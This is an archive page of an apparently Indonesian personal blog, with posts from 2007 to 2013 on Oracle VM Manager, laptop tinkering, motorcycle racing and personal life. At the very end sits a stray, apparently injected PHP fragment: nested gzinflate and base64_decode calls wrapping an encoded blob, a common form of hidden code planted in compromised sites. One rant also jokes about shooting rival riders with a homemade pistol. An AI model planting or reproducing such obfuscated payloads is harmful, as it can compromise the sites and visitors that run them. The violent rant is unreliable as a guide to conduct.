Delicious

Archives

Categories

Archive for 'Kebiasaan' Category





« »

Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager dengan base OS menggunakan Oracle Linux 6.x. install OS seperti biasa..

Minimum spec prerequisite OVM:

  • – Memory: 1.5 GB (4GB jika pakai Oracle DataBase XE)
  • – Processor: 64 bit
  • – Swap: > 2.1 GB
  • – Disk Space: 5 GB untuk /u01 dan 2 GB /tmp

 

semua source dapat di download di: https://edelivery.oracle.com/
untuk update packages Oracle Linux via yum (bisa baca disini

berikut list kebutuhan port untuk komunikasi OVM – OVS – Client



Slowly fade away…

  ozzie / 16/12/2012

Thanks all..



TFT Touchscreen @ Arduino Mega ADK

  ozzie / 14/10/2012

all alone

  ozzie / 30/09/2012

weekly activites

  ozzie / 05/07/2012

Streaming Enduro Matic

  ozzie / 27/05/2012

Everything’s like before

  ozzie / 11/03/2012

oz

Restore the balance between thinking and feeling….. Open up and let it flow…. ;)



Maenan Baru..

  ozzie / 31/05/2009

Alhamdulillah ada rejeki tambahan.. [-o<
jadi tambah koleksi maenan baru deh… :D

akhirnya baju merah gentayangan lagihhh \:d/ \:d/ \:d/



Aspire One gw Blank Screen!!!

  ozzie / 18/02/2009

Semenjak kehadiran laptop baru hasil berjelajah di KasKus ;)).. jadi doyan ngoprek-ngoprek lagi:">.. sebelumnya sempet di temenin oleh beberapa laptop terdahulu yang kesemuanya hancur akibat oprek-mengoprek :)) (Today pakek AspireOne :D )..

Sengaja milih yang kecil biar lebih simple dan gampang nemenin kemana-mana sekalian setting CDI ama jetting bareng koleksi spuyer 8-}.. di bengkel, di kantor, di DataCenter, maintenance outdoor pun gak ribet:D.. apalagi bisa nonton pelem dimana-mana yak say 8-}8-}..

dengan semangat ngoprek akhirnya install slackware 12.2 :D.. biarpun gak punya CD-ROM:-s tapi dengan modal ikut-ikutan forum aspire one akhirnya dapet referensi buat install linux via USB <:-p<:-p

selesai install semua fungsi berjalan dengan mulus [-o<[-o<.. webcam, wireless, touchpad, vga, sound, ethernet, dan indikator battery. belon puas dengan kernel bawaan slackware 12.2 (2.6.27) akhirnya compile ulang kernel dengan tujuan customization selera gw :)):))..

dipilihlah kernel 2.6.28.5-ozz :D.. build kernel sampe selesai trus booting:-ss:-ss.. alhamdulillah semua running dengan baik [-o<… karena ada beberapa fitur kernel yang kurang pas {verbose kernel time, framebuffer, hotkey function} akhirnya re-compile lagih #:-s.. compile selesai diteruskan dengan reboot.. ternyata :-ss:-ss:-ss:-ss… blank :((:((:((… cabut-colok battery gak ngaruh.. :((.. cari-cari selah buat clear bios tapi… :-s.. akhirnya googling.. dan ternyata. banyak yang ngalemin fenomena ntuh ;)).. bios gak fungsi gara-gara kepanasan:-<.. solusinya dengan upgrade firmwire dengan flash biosnya ;));))..

Alhamdulillah kembali normal [-o<[-o<



Lucky Bastard

  ozzie / 18/11/2008

Mungkin gw emang bajingan yang cukup beruntung :D.. dengan pola hidup yang acak-acakan 8-} dan pemikiran yang Nggak Bangettt… ;))

Terispirasi dari quote di PDA salah satu abang gw :">:">

Gagal MeRencanakan berarti MeRencanakan keGagalan

Alhamdulillah [-o< [-o< [-o< Atas berkat Rahmat Allah SWT.. cita-cita gw selama 4 bulan terakhir udah ter-Realiasai <:-p<:-p

Dari mulai Kuliah yang udah selesai\:d/\:d/.. dengan embel-embel title di belakang nama:"> ditambah Ijazah yang Sangat Memuaskan dengan tugas akhir membahas BGP :D.. dengan grade yg lumayan lah untuk kelas mahasiswa bego kayak gw :">.. dan beberapa sertifikat RDBMS, Networking dan Linux dari Informatics sebagai lembaga sertifikasi:D… dan InsyaAllah [-o<[-o< rencana kedepan akan mengikuti wisuda pada bulan desember mendatang<:-p.. dan InsyaAllah jika ada Rezeky akan meneruskan Sekolah Lagih[-o<.. biar gak gampang di Bego – in .. :)>-

Ngebangun motor kenceng ;));)).. dengan total pengeluaran yang ampir setara dengan harga motor nya:)):)).. dan InsyaAllah akan di-ikut sertakan dalam event balap resmi maupun tidak resmi (Liaran :red) 8-}.. dan InsyaAllah tahun depan mencari pengganti si Item buat harian:-s.. maklumlah.. Kerjaan Gak Jelas 8-}8-}

Telah memiliki barcode dan tergabung sebagai Anggota Inti<:-p<:-p.. dan ikutan belajar berorganisasi:">:">.. walupun untuk sekarang hanya baru bisa ikut berkontribusi dalam dunia maya8-| sebagai donatur infrastruktur website (SSFC) :D:D… Moga-moga jiwa sosial gw gak ketinggalan [-o<[-o< maklum.. secara gw Kurang Gaol ;))

Penyakit gw udah sembuh tanpa harus melewati operasi<:-p.. dengan menggunakan ramuan tradisional :D :D.. ternyata Mujarab;)

Mungkin rencana kedepan masih banyak.. memperbaiki kinerja:-s… meningkatkan knowledge:"> maen OpenSource lagi:D.. membangun infrastruktur bengkel[-o<.. belajar mikir8-}..



DragBike

  ozzie / 03/08/2008

Bangun pagi langsung berangkat ke D2M. Persiapan meluncur ke Sentul. dengan membawa ninja buat bertarung di 201 Meter.. \:d/\:d/\:d/

Menjelang siang Achie pun datang:">:">.. namun sangat disayangkan dari pihak security sirkuit yang melakukan pungli walaupun achie berada pada pihak peserta :-<:-<



2008

  ozzie / 01/01/2008

taon 2007 udah liwat :-h:-h:-h….

alhamdulillah udah ada peningkatan [-o<[-o<[-o< dari segi sosial, ekonomi, budaya.. ;));))
harapannya taun 2008 bisa lebih :

  • dewasa [-o<
  • bertanggung jawab [-o<
  • nambah pahala[-o<
  • kurangin dosa [-o<
  • sabar :">:">
  • sayang :X:X
  • rajin nabung :D
  • konsen di skripsi 8-}
  • nambah income \:d/\:d/<:-p
  • majuin komunitas opensource :D
  • nambah ilmu:D
  • sigap baca sikon 8-}
  • manpaatin peluang :D
  • ngatur pola tidur, makan & istirahat :D
  • ngatur waktu \:d/
  • ……
  • ……
  • ……
  • HOT & Tokcerrrrr ;));));));))
  • Oiyah #-o#-o#-o lebih kenceng ;));)) [nutup PAIR, ganti CDI, Coil, Karbu + exhaust 8-}]
  • and then Flexible :)>- :D

8->8-> mungkin segituh dulu wish list nya [-o<[-o<[-o<

But this time I think… It’d be better if I ….. 8->8->



Hancurnya 3 MiniPCI

  ozzie / 09/12/2007

MiniPCI = Ngoprek Gagal… 8-}8-}

Ceritanya sih pengen upgrade wireless di laptop:">:"> Sekalian pengen ngoprek wireless di slackware berhubung chipset nya Atheros\:d/\:d/ biasanya connect di laptop pake PCMCIA cisco aironet.. ditambah pigtail 10cm yang palanya pake MMCX ama NFemale buat berpetualang di outdoor.. ;));)).

MiniPCI

1st: bongkar laptop.. kebetulan udah ada antenna internal yang ujungnya pake UFL. dan masih ada slot minipci nganggur di dalemnya.. pasang minipci dan tancepin connectornya.. lalu nyalain laptop gak taunya bentrok IRQ nya :-ss:-ss.. bongkar lagih\:d/\:d/.. dengan rencana cadangan tuker minipci nya.. dalem hati “kayaknya minipci nya gak support deh”8->8-> … begitu di tarik connectornya:-ss:-ss:-ss… ternyata connector UFL nya lepas dari PCB nya :((:((:((.. gak kepake dah tuh minipci:-<… berhubung masih ada sisa.. pasang lagih minipci yg laen <:-p<:-p ternyata:-ss.. kejadian serupa terulang kembali 8-}8-}8-}.. hingga 3 kali berturut-turut :((:((:((

2nd: DONT TRY THIS AT HOME >:)>:) 8-}8-}

mau pinter kok mahal :-<:-<



My New Hair..

  ozzie / 17/10/2007

Keasikan nongkrong lagih ;));)) begadang di pinggir jalan 8-}8-}
Nge-Gimbal-in rambut mumpung udah panjang \:d/\:d/\:d/
Rambut baru Abis lebaran <:-p<:-p<:-p<:-p<:-p

Ozzienich

Mo liat Koleksi Rambut Ozzie ??? ;;);;)

Makasih buat semua yg nongkrong di Ex. Studio ASA & warnet GAMMA ;));)) ;)

 

* No Matter what they Say!! :-":-":-"
Gak Suka?? :>:>:> Lo Siape??? 8-}8-}8-} Berantem yuk? >:/>:/>:/



What’s Going On With My Life

  ozzie / 17/09/2007

Suddenly…. :-s:-s:-s:-s:-s:-s:-s:-s:-s:-s..
:((:((:((:((:((:((:((:((:((:((:((:((:((:((

Mungkin. sayah yang kurang sabar :-<:-< dan “I hate that feeling
:((:((:((:((:((:((:((:((:((:((:((:((:((:((

UPDATE: that feeling won`t go away!!!
:((:((:((:((:((:((:((:((:((:((:((:((:((:((



Marhaban ya Ramadhan

  ozzie / 12/09/2007

Alhamdulillah Bulan Ramadhan hampir tiba [-o<[-o< saatnya mengurangi downtime dan memanfaatkan waktu\:d/\:d/ daripada harus menghadapi terik matahari disiang hari.. akhirnya beres-beres link guna menghindari hal yg tidak di inginkan ;)) (masih doyan main ke outdoor) :"> padahal sih kerjaan di NOC masih banyak 8-}8-} ditambah Research & Development mumpung ada donatur :-s:-s ( nanti ajah pak ngoprek-ngopreknya ;)) sekalian puasa l-) report nyusul dehh ;) okeh? :> hheheh ;) )
tapi waktu buat eneng pasti ada kok :X:X :"> :)>-
Dengan di lengkapi Kasur, Laptop, rokok, cemilan dan air mineral kami (yang bawa perangkat si bodong 8-}8-} ) berangkat ke Roof<:-p
Ozzie Nich
* di lift pen ngantor 8-}8-}

Lumayan sekalian Piknik di roof ngetawain orang \:d/\:d/\:d/



Merah-Putih

  ozzie / 20/08/2007

18-Agustus-2007

Liburan HUT RI ke 62.. \:d/\:d/
Sesuai temanya dresscode pake Merah Putih 8-}8-}.. \:d/\:d/

1. Pagi-pagi udah ada Problem mana masih ngantuk pula :((:((:(( gara2 listrik dari pihak gedung:-s..

Ozzie
Dokumentasi Merah-Putih 1
2. Dapet Undangan Acara AWALI sekalian launching ZenCafe release 1.2 di Sekretariat AWALI Jabotabek <:-p<:-p

Awali & Zencafe

Dokumentasi Merah-Putih 2

*. L-R: Sebastian, Romi [Awali Jawa-Tengah], Ozzie, Anjar Hardiena [Zencafe]



Bangsadh!!!

  ozzie / 10/08/2007

10/08/07 – Pulang Kerja
Bismillahirohmanirohim [-o<

Sebelumnya Mohon maaf kalo ada kelompok/institusi/organisasi/pihak” yang merasa tersinggung 8-}8-}.. mungkin bisa jadi bahan Renungan?? :-<:-<

Prihatin.. Kecewa.. Kesel. #:-s#:-s disaat pulang kerja, dengan kondisi jalan di kawasan jakarta yang padat oleh antrian kendaraan.. ada pihak-pihak yang menamakan dirinya klub/komunitas yang melintasi antrian kemacetan dengan gaya ‘Jagoan‘ main nyerobot, nyeruduk” (Untung gak Nyangkut tuh Gerobak di belakang):)).. memotong.. menghadang perempatan jalan demi rombongan (baca: komunitas) mereka lewat. :-w:-w.. yang bisa dibilang sangat mengganggu, meresahkan, mengganggu konsentrasi dan mengancam keselamatan para pengguna jalan yang lain.. :-? :-? hmmm…. Punya Otak gak sih om?#-o Mungkin rame-rame kali yak? 8-}.. tau dah kalo pada jalan sendirian :-??:-?? 8-}8-}.. udah pada bisa nebak kan??\:d/\:d/ bagooosss<:-p ..

Culik ajah;))Siapa yang kuat, dia yang menang ‘ hukum jalanan berlaku \:d/\:d/.. next time bawa pistol rakitan ajah:D.. macem-macem tinggal Tembak ditempat.. lalu tinggal? :> <:-p

Sorry yak om? :)>-:)>-. denger” katanya disetiap club motor punya tehnik tentang Safety Riding?? :-/ kok gak di pake sih om?? #-o#-o TOLOL amat sih 8-}8-}… ngapin ikut2 begituan kalo gak dipake??.. pen dibilang gagah? :> jantan?:-& keren?8-} gaya?:> gaol? 8-} ..

Pake maenin lampu sen, sirene, knalpot segala #-o.. Giliran dikejar 8-} ehhh… malah merapat kebarisannya 8-}8-}.. capeeee deeeee8-}8-} .. kalo mo nge-Test boleh lah;;);;);;)… percumalah om motor keren” kalo Jockey – nya manja, penakut dan bawanya GAGAP..8-}8-}.. takut lecet kali =))

Moga” ane bisa lebih sabar[-o<[-o< … dan alhamdulillah belon pernah Matiin (Nyawa) Orang dijalan.. 8-}8-}

:)>-:)>-
salam damai dari pengguna jalan yang masih pake standar dari pabrik.. 8-}



The Truth

  ozzie / 21/07/2007

Bismillahirohmanirohim…

   “The truth is the truth and the only thing you can do is to live with it.”… begitulah kata pepatah.. Kebenaran harus ditegakan, walaupun dalam realisasinya harus memakan korban.. Tetapi semua kembali kepada para pelaku dalam menyampaikan dan menyikapinya dengan Tegas… don’t be afraid…. just be your self;).. i’ts Okey, i’ll be fine..;)

Ada Hikmah dan banyak pembelajaran yang di dapat dari menjadi seorang ranger dalam menegakan kebenaran dan keadilan dan memberantas penindasan dan kemungkaran 8-}8-}…. hingga belajar hidup lebih jujur, apa adanya, saling berbagi, menerima dan bertanggung jawab terhadap decision yang diambil.. ;)… berharap masih ada Second Chance.. [-o<

Golden Days are passing over, never thought i’d feel like this, Goodbye to all the past, see you on the other side :-h:-h:-h

Thank you for Inspiration, Patience, Advice, Friendship… you’re the great influence.. :*:*:*…. love you :">:">

Jakarta, 21-Juni-2007 : 03:25.
I hope to find the truth… 8->



Man-In-The-Middle

  ozzie / 10/07/2007

Dari berbagai hasil Googling : Man-In-The-Middle merupakan suatu bentuk Serangan pada suatu LINK yang harus di Hindari dan di Waspadai.8-}8-}8-}.. seperti yang di jelaskan dalam WIKI. :>
Man-In-The-Middle

:-?:-? dengan berbagai macam cara dan tehnik #:-s.. haruskah kita Menjadi Pelaku Man-In-The-Middle atau Menjadi Korban Man-In-The-Middle ??? :-s:-s
Namun semua Keputusan ada di Destination yang mengingatkan pada prinsip hacking-and-defense 8-}8-} (http://blog.ozzie.web.id/blog.ozzienich?p=199)

Life is a perfect lies ;));)) No Bodys Perfect :-s :(|):(|)

GOODBYE TO ROMANCE :-< :-< :-<

Glossary: 8-}

* Googling = Proses Mencari, Investigasi, Scanning.
* Serangan = Suatu kegiatan yang merugikan.
* Link = Hubungan yang sedang di bina / di jalanin.
* Pelaku = Pejuang yang sukses.
* Korban = Pejuang yang gagal.
* Destination = Tujuan / Target.



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>